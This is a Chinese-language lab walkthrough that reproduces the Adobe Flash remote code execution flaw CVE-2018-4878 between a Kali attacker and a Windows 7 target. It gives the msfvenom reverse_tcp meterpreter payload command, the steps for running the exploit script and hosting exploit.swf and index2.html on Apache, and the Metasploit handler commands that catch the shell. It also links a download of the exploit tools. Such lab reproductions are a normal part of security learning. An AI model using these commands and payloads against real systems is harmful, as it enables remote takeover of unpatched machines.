1、漏洞概述
2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878)。
攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell。
直到2018年2月5号,Adboe才发布补丁来修复此0 day漏洞。
漏洞影响的版本:
image.png
2、漏洞的复现
0x01环境的配置:
攻击机:Kali 192.168.10.116
靶机:win7 192.168.10.100
exp:cve-2018-4878.py
flash:flashplayer_activex_28.0.0.137.exe
上面用到的工具都放在网盘里面了:https://pan.baidu.com/s/1dotCoCx0AX8sgUaOqFT9vw 密码:0li0
1.png漏洞的复现是参照大佬的陈鑫杰这篇文章写的
0x02漏洞的复现
1、将网盘中的CVE-2018-4878-master目录下载下来,并放入Kali Linux桌面
2.jpg
2、使用msfvenom生成shell代码
生成代码,其中lhost为kali的ip地址,lport为自定义的端口号
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.116 lport=8888 -f python>shellcode.txt
3.jpg
3、查看代码文件
cat shellcode.txt
4.jpg
4、进入CVE-2018-4878-master目录,编辑CVE-2018-4878.py文件
将上面msfvenom生成的代码覆盖掉原来的代码:
5.jpg
5、查看当前路径
6.jpg
6、修改CVE-2018-4878.py下面的文件信息(后面会用到,之后保存修改退出):
7.jpg
7、Kali Linux进入CVE-2018-4878-master路径,用Python执行CVE-2018-4878-master.py代码
root@kali:~/Desktop/CVE-2018-4878-master# python cve-2018-4878.py
root@kali:~/Desktop/CVE-2018-4878-master# ls -l
8.jpg
8、Kali Linux开启Apache2服务,并将上面的2个文件放入/var/www/html目录中(apache web路径)
root@kali:~/Desktop/CVE-2018-4878-master# service apache2 start
root@kali:~/Desktop/CVE-2018-4878-master# cp index2.html /var/www/html/index2.html
root@kali:~/Desktop/CVE-2018-4878-master# cp exploit.swf /var/www/html/exploit.swf
9.jpg
此时,Kali Linux上Web服务启动,并且具备index2.html这个页面。只要靶机启用flash并访问了这个页面,则可以直接被控制。
9、Kali Linux开启Shell会话监听
使用handler监听模块
msf > use exploit/multi/handler
回弹一个tcp连接
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
设置kali渗透机的ip地址
msf exploit(handler) > set lhost 192.168.10.116
设置监听端口,这个需跟上面msfvenom设置的端口一致
msf exploit(handler) > set lport 8888
开启监听,等待肉鸡上线
msf exploit(handler) > exploit
10.png
10、Windows7 安装flash插件,并用IE浏览器访问页面
安装flash插件 ,安装flash的时候可能出现让你下载最新版本,可以断网之后进行安装(或者如果是X64操作系统的话,我是win7 x64 就修改注册表里面的内容HKEY_LOCAL_MACHINE/SOFTWARE/wow6432Node/Macromedia/FlashPlayer/SafeVersions)
11.jpg
11、使用Win7内置IE 8浏览器访问页面:http://192.168.10.116/index2.html
12.jpg
12、Kali Linux 上获取meterpreter shell,并进行管理
12.jpg
实验结束
网友评论